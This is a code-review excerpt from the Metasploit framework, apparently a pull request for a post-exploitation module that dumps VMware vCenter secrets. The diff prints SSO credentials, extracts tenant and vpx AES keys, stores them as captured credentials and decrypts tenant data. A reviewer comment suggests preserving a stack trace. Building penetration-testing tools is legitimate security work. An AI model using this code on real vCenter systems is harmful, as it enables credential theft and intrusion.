modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,875 @@
+      print_good("\t  SSOUSER: #{sso_user}")
+      print_good("\t  SSOPASS: #{sso_pass}")
+      print_good("\tSSODOMAIN: #{sso_domain}")
+    end
+  end
+
+  def get_aes_keys_from_host
+    print_status('Extract tenant and vpx AES encryption key...')
+
+    tenant_key = get_aes_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
+    fail_with(Msf::Exploit::Failure::Unknown, 'Error extracting tenant and vpx AES encryption key') if tenant_key.nil?
+
+    tenant_key.each do |aes_key|
+      aes_key_len = aes_key.length
+      # our first case is to process it out
+      case aes_key_len
+      when 16
+        self.vc_tenant_aes_key = aes_key
+        self.vc_tenant_aes_key_hex = vc_tenant_aes_key.unpack('H*').first
+        vprint_status("vCenter returned a plaintext AES key: #{aes_key}")
+      when 24
+        self.vc_tenant_aes_key = Base64.strict_decode64(aes_key)
+        self.vc_tenant_aes_key_hex = Base64.strict_decode64(aes_key).unpack('H*').first
+        vprint_status("vCenter returned a Base64 AES key: #{aes_key}")
+      when 64
+        self.vc_sym_key = aes_key.scan(/../).map(&:hex).pack('C*')
+        self.vc_sym_key_raw = aes_key
+        print_good('vSphere vmware-vpx AES encryption')
+        print_good("\tHEX: #{aes_key}")
+      else
+        print_error("Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{aes_key_len}")
+        next
+      end
+
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: base_fqdn
+      }
+      # our second case is to store it correctly
+      case aes_key_len
+      when 16, 24
+        print_good('vSphere Tenant AES encryption')
+        print_good("\tKEY: #{vc_tenant_aes_key}")
+        print_good("\tHEX: #{vc_tenant_aes_key_hex}")
+
+        store_valid_credential(user: 'STS AES key', private: vc_tenant_aes_key, service_data: extra_service_data.merge({
+          port: 389,
+          service_name: 'ldap'
+        }))
+      when 64
+        store_valid_credential(user: 'VPX AES key', private: vc_sym_key_raw, service_data: extra_service_data.merge({
+          port: 5432,
+          service_name: 'psql'
+        }))
+      end
+    end
+  end
+
+  def tenant_aes_decrypt(b64)
+    # https://github.com/vmware/lightwave/blob/master/vmidentity/idm/server/src/main/java/com/vmware/identity/idm/server/CryptoAESE.java#L44-L45
+    ciphertext = Base64.strict_decode64(b64)
+    decipher = OpenSSL::Cipher.new('aes-128-ecb')
+    decipher.decrypt
+    decipher.padding = 0
+    decipher.key = vc_tenant_aes_key
+    return (decipher.update(ciphertext) + decipher.final).delete("\000")
+  rescue StandardError
+    fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
```

Comment:
Let's preserve the stacktrace here.

```suggestion
  rescue StandardError => e
    elog('Error performing tenant_aes_decrypt', error: e)
    fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
```